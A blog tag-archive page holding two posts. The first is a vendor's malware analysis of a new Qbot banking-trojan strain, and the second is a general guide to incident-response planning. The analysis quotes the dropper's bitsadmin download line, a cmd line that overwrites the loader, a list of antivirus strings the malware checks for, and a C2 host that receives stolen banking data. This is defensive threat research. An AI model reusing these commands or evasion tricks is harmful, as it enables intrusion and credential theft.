Tag Archives: cyber incident

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thou...

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims

The Varonis Security Research team discovered a global cyber attack campaign leveraging a new strain of the Qbot banking malware. The campaign is actively targeting U.S. corporations but has hit networks worldwide—with victims throughout Europe, Asia, and South America—with a goal of stealing proprietary financial information, including bank account credentials.

During the analysis, we reversed this strain of Qbot and identified the attacker’s active command and control server, allowing us to determine the scale of the attack. Based on direct observation of the C2 server, thousands of victims around the globe are compromised and under active control by the attackers. Additional information uncovered from the C&C server exposed traces of the threat actors behind this campaign.

The attack was initially detected by Varonis DatAlert which alerted one of our North American customers of dropper activity, internal lateral movement, and suspicious network activity.

Our team has shared additional non-public information with the appropriate authorities and are performing responsible disclosure.

New Variant of Qbot Banking Malware

The threat actors used a new variant of Qbot, a well-known and sophisticated malware designed to steal banking credentials. Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders.

The malware is polymorphic, or constantly changing:

  • It creates files and folders with random names
  • Its dropper frequently changes C2 servers
  • The malware loader changes when there is an active internet connection (more on this later)

Qbot (or Qakbot) was first identified in 2009 and has evolved significantly. It is primarily designed for collecting browsing activity and data related to financial websites. Its worm-like capabilities allow it to spread across an organization’s network and infect other systems.

Discovery

Our forensics team began investigating after receiving a call from a customer, whose implementation of DatAlert had alerted them to unusual activity in their systems. Our team determined that at least one computer had been infected with malware and was attempting to propagate to additional systems on the network.

A sample was extracted and sent to our research team for analysis, who identified the malware as a variant of Qbot/Qakbot. The sample did not match any existing hashes, and further investigation revealed that this was a new strain.

Phase One – Dropper

File name: REQ_02132019b.doc.vbs

In previous versions of Qbot, the first launcher was a Word document macro. A zip file with a .doc.vbs extension was found during our investigation, indicating that the first infection was likely carried out via a phishing email that lured the victim into running the malicious VBS file.

Upon execution, the VBS extracts the OS version of the victim’s machine and attempts to detect common anti-virus software installed on the system.

AV strings the malware looks for include: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, Mcafee, symantec

In this variant, the malware uses BITSAdmin to download the loader.  This appears to be a new behavior, as previous samples used PowerShell.

BITSAdmin downloads the loader from one of the following URLs:

Downloading the loader using BITSAdmin from the VBS code:

intReturn = wShell.Run(‘bitsadmin /transfer qahdejob’ & Second(Now) & ‘ /Priority HIGH ‘ & el & urlStr & ‘ ‘ & tempFile, 0, True)

Phase Two: Gain Persistency and Inject to explorer.exe

Filename: widgetcontrol.png

The loader, which executes the core malware, has multiple versions and is constantly updating even after execution. The version that the victim receives upon infection is dependent on the sp parameter that is hardcoded in the VBS file.

One interesting point is that each version of the loader is signed with a different digital certificate. Valid certificates usually indicate a file is trustworthy, while unsigned executables are suspicious.

Qbot is known to use fake or stolen, valid digital certificates to gain credibility and evade detection on the operating system.

We downloaded all the available versions of the loader (see IOCs below) and mapped the certificates.

Certificates used by the malware:

  • Saiitech Systems Limited
  • ECDJB Limited
  • Hitish Patel Consulting Ltd
  • Doorga Limited
  • INTENTEK LIMITED
  • Austek Consulting Limited
  • IO Pro Limited
  • Vercoe IT Ltd
  • Edsabame Consultants Ltd
  • SOVA CONSULTANCY LTD

Example of one of the certificates:

Persistence

When first run, the loader copies itself to %Appdata%\Roaming\{Randomized String} and then creates the following:

Injected Explorer.exe

The loader launches a 32-bit explorer.exe process and then injects the main payloads.

Here is the memory of explorer.exe with the injected payload as RWX memory segment:

Here is the memory of explorer.exe with the injected payload as RWX memory segment:

After the injection, the loader overwrites its original executable with the 32-bit version of calc.exe:

“C:\Windows\System32\cmd.exe” /c ping.exe -n 6 127.0.0.1 & type “C:\Windows\System32\calc.exe” > C:\Users\{TKTKTK}\Desktop\1.exe

Phase Three: Lateral Movement and Stealing Money

After establishing persistence, the main payloads begin to brute force accounts on the network.

If the malware compromises a domain account, it enumerates the “Domain Users” group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.

Authentication attempts use NTLM, and the API WNetAddConnection.

We extracted the usernames and passwords the malware uses when attempting to brute force local accounts (found here). The malware hides these dictionaries from static analysis, but they can be extracted during runtime.

X32dbg image of explorer.exe trying to connect to a remote computer with the username “Administrator” and the password “12345678”:

Show Me the Money

The main goal of Qbot is to steal money from its victims; it uses several methods to send financial, credential and other information back to the attacker’s server:

  • Keylogging – Qbot captures and sends every keystroke that the victim enters and uploads them to the attacker.
  • Credentials/cookies – Qbot searches for saved credentials/cookies from browsers and sends them to the attacker.
  • Hooking – the main payload injects to all the processes in the system with a code that hooks API calls and searches for financial/banking string the malware extracts the data, credentials, or session cookies from the process and uploads it to the attacker.

The image shows that when authenticating to banking site buisnessline.huntington.com, the malware sends the POST data and the session cookies to the C2 server content.bigflimz.com:

Inside the Attacker’s C2 Server

On one of the attacker’s sites, we were able to find log files containing the victim IPs, operating system details, and anti-virus product names. The C2 server revealed past activities, as well as what appears to be additional malware versions (version table in the IOC section, below).

Some of the results may contain duplicates, but below are the top 10 countries, anti-virus products, and operating systems found. You can also find the full data set in our Github repository.

Victims by Country

We found 2,726 unique victim IP addresses. As many organizations use port address translation that masks internal IP addresses, the number of victims is likely much larger.

Victims by Anti-Virus Found

Victims by Operating System

IOCs

IOCs can be found on Github here.

Loader Versions

Full list found here.

How to Respond to a Cyber Security Incident

How to Respond to a Cyber Security Incident

Every day another company is caught off guard by a data breach. While avoiding an attack is ideal, it’s not always possible. There’s no such thing as perfect security. Even if you’ve outsourced your IT or your data lives in the cloud, ultimately the responsibility for keeping your customer data safe falls on your shoulders.

In the unfortunate case that your company suffers a breach, you should be prepared to address it swiftly. To help, we created an easy to implement plan that outlines ways to proactively respond and recover from a cyber security incident.

Avoid

pexels-photo-30267-medium

Avoiding an attack is best whenever possible – but it’s just as important to have a cyber incident response plan in place in anticipation of an attack.

Take Inventory

What information is mission critical to your organization? Where does it live? How quickly can it be reinstated if it’s taken out in an attack?
Perform a complete audit of your systems, take note of the most important components, and track everything . Make sure you are not the only person aware of this document.

Pick a Team (or Two)

Now that you know what is most important, make sure all the relevant players are aware as well. Nominate one person as the IT owner in the event of a cyber attack. This individual needs to be readily available in case of an emergency, and equipped to manage the many internal technical components involved with recovering from a breach.  Nominate a second person to own the management of external needs of a breach – such as outreaching to public relations, getting in touch with the organization legal counsel, etc. Both of these roles are critical for a timely and effective response. Just to be safe – pick a second in command for both teams. After all, no man is an island.

Make a Plan

You know the data, you have the right people in place – now it’s time to develop an actionable plan and provide specific, concrete procedures to follow during a cyber incident. The procedures should address:

  • Who has lead responsibility?
  • How to contact critical personnel, and what data, networks, and services should be prioritized for recovery.
  • How to preserve data that was compromised by the intrusion and perform forensics to review for gaps in security and insights into the actual attack.
  • Who needs to be notified (data owners, customers, or partner companies) if their data or data affecting their networks is stolen.
  • When and what law enforcement will be brought into the picture, as well as any regulated reporting organizations.

Need a little more guidance? The California Department of Technology has a wonderful outline available online that is a great starting point!

Once developed, this plan should NOT live in a bubble. Make sure everyone on the team is aware and has read and reviewed. In addition, take time to appraise the plan every quarter for relevancy and update as necessary. Unfortunately, security is not static. Also, this is important; it should be tested PRIOR to an actual cyber incident. Tornado, zombie apocalypse or biblical flooding is NOT the time for a try-out.

Address

marketing-man-person-communication-medium

Despite all your planning, preparation, and good intentions – what happens if (when) you are struck by a cyber attack? First things first – implement your cyber incident plan as soon as possible. Take a critical assessment of the situation. Does it appear to be a malicious attack or a simple tech glitch or misconfiguration? Once you’ve determined intent (and it’s not good), it’s time to collect and preserve the impacted data, and put the rest of your plan into action.

Who You Gonna Call?

Shhh…it’s not Ghostbusters! You should already have this information in place and readily available in your cyber incident plan. Start your outreach right away and begin with your response owners and work your way down the line. For example, the “external” owner at your organization should notify law enforcement, possible victims and the Department of Homeland Security, if necessary. Overall, the best approach is transparency. No one wants to admit to a breach. However, hiding critical information or delaying notification can backfire. A good approach involves being as direct as possible, highlighting the known and promising a timely follow up on any unknown. As always, keep it simple and straightforward. Don’t make promises you cannot keep or address concerns that are not valid.

You Might Need a Professional

Sometimes an internal response team just isn’t enough. Fortunately, there are many third-party organizations that specialize in incident response and can help you navigate through the breach. The fresh set of eyes can look at the breach in a way internal staff – already vested in the company and outcome – cannot. They can help you discover exactly what has been accessed and compromised, identify what vulnerabilities caused the data breach, and re-mediate so the issue doesn’t happen again.

Verify, then Reinstate

Finally, verify that your backup data was NOT compromised. It would be “no es bueno” to restore your system using data that you believe is valid, only to discover that your backup was just as bad as your compromised data.

Action

people-new-york-train-crowd-medium

Even after a cyber incident appears to be under control, remain vigilant. Many intruders return and attempt to regain access to networks that they previously compromised. It’s possible that, despite your best efforts, a hacker could STILL find a way into your system. They are a slick, determined bunch.

Monitor & More

Continue to monitor your system for out of the ordinary activity. Invest in a software solution that utilizes User Behavior Analytics to recognize unusual behavior and notify prior to an actual attack. Varonis, for instance, will recognize and notify about both external and internal threats before irreparable damage can be done.

Just the Facts Ma’am

Once your organization has recovered from the attack, it’s time to thoroughly review what happened, and take steps to prevent similar attacks. What went well with the cyber incident response plan? What may need just a wee bit of tweaking? Assess the strengths and weaknesses of the plan, and determine what needs adjusting. Implement the changes. You’ll be glad you did if (when) you are attacked again.

React, Revise & Revisit

Protecting against a cyber incident is a full-time job. As ransomware evolves and the insider becomes a consistent threat, it’s important to continuously revise and revisit your Cyber Incident Response plan:

  • Keep your plan up to date.
  •  Have the right technology in place (including lawful network monitoring) to address an incident.
  • Hire legal counsel that is familiar with the complex issues associated with cyber incidents.
  • Make sure existing corporate policies align with your incident response plan.

A cyber incident is never something you want to face. However, being proactive and prepared will make a huge difference in your response.